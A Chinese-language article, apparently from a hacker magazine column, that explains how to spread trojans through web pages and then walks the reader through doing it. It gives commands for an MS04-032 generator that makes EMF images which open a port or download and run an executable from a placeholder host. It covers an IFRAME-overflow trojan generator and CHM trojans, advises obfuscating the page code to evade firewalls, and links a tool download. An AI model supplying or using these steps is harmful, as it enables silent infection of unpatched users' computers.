小刘有早起看网络新闻的习惯,今天他照例打开了QQ上网,却收到一个陌生人发来的图片链接,对方还说该链接中的内容正是这几天被大家津津乐道的某个热点事件。小刘想都没想就点击进入,谁知打开的却是一个广告页面。暗自纳闷的小刘不知道此时已有木马进入他的计算机……
各式各样的木马程序之所以会在网络上横行,网页传播是功不可没的。相对于其他传播途径,网页传播的危害面非常广泛,而IE层出不穷的漏洞也使很多朋友在不知不觉中中招。这一期的木马屠城,笔者就针对木马如何被传播出去这一问题,对最近较经典的网页木马传播方式进行剖析,让大家知道这些“夹心”网页中的木马是怎样将用户杀于无形之中的。
图形渲染漏洞
大家可曾想过浏览一个图片文件就会中木马,并且还不是以前的那种以“.JPEG”结尾的木马,因为Windows又给黑客们爆出了一个更新的可利用漏洞。
screen.width-300)this.width=screen.width-300' border='0' alt='Click to Open in New Window'>
在Windows XP SP1、Windows Server 2003、windows 2000 SP4中,系统对Windows图像文件(WMF)和增强型图像文件(EMF)图像格式进行的渲染存在一个远程代码执行漏洞,它使得恶意攻击者可以在受影响的系统上执行远程代码。漏洞的利用十分简单,我们只需要使用ms04-032溢出程序即可生成带溢出效果的EMF图片。
进入命令提示符窗口,输入格式为“ms04-32.exe ”的命令。
提示:溢出方式可分为“1-端口方式溢出”和“2-下载溢出”。
例如输入“ms04-32 1.emf 1 21”,这样就生成了一个可以打开21端口的EMF图片。
提示:输入“ms04-32 test.emf 2 http://www.xxx.xxx/xxx.exe”,就生成了一个可以自动在http://www.xxx.xxx/xxx.exe下载并自动运行xxx.exe这个程序的EMF图片。
现在只要把此图片上传到自己的空间,然后将图片地址发给对方,没有及时更新补丁的用户看了图片后就会在不知情的情况下中招。
IFRAME溢出型木马
在这里笔者要给大家介绍的是如何让对方通过访问一个看似平常的网页,而不知不觉地中木马。这是网页木马传播最主要的途径,因为看似平常的网页浏览,也会带来很多严重的后果。
当IFRAME溢出公布后,网上就有高手针对已经公布的恶意代码进行了修改并写成了专门的木马生成器,使得它能顺利地工作在 Windows 98、Windows Me、Windows 2000、Windows XP SP1(IE6)等系统下。由于它的危害很大,安装了IE6的电脑会受到iFrame漏洞的影响(不包括已升级到Windows XP SP2的系统)。
运行wymmpro.exe程序后,出现如图2所示的界面。首先在第一行填入已准备好的木马程序路径(网络路径),接下来在第二栏中选择IE的弹出方式和自定义生成的木马网页名。建议大家选择第一项,这样就可防止某些系统拦截所弹出的窗口。
[1] [2]
screen.width-300)this.width=screen.width-300' border='0' alt='Click to Open in New Window'>
接下来在第三栏中选择默认的大内存方式(用于网页木马)。为了防止对方使用的是IE5.0/5.5而不会中招,我们可以在此生成CHM木马来达到传播的目的,我们只需要把准备好的木马程序放到木马生成器的CHM目录下,并根据提示填写好木马程序名和欲生成的CHM文件名以及用来存放该CHM的网络地址即可。
最后就是包装工作,我们可以选择对生成的网页木马代码进行压缩或加密,防止被带网页代码监控功能的防火墙拦截。现在,一个活生生的网页木马就制作好了。
软件下载地址:http://www.sixvee.com/520yy/tools/cytkk-3.rar
(出处:http://www.sheup.com)
[1] [2]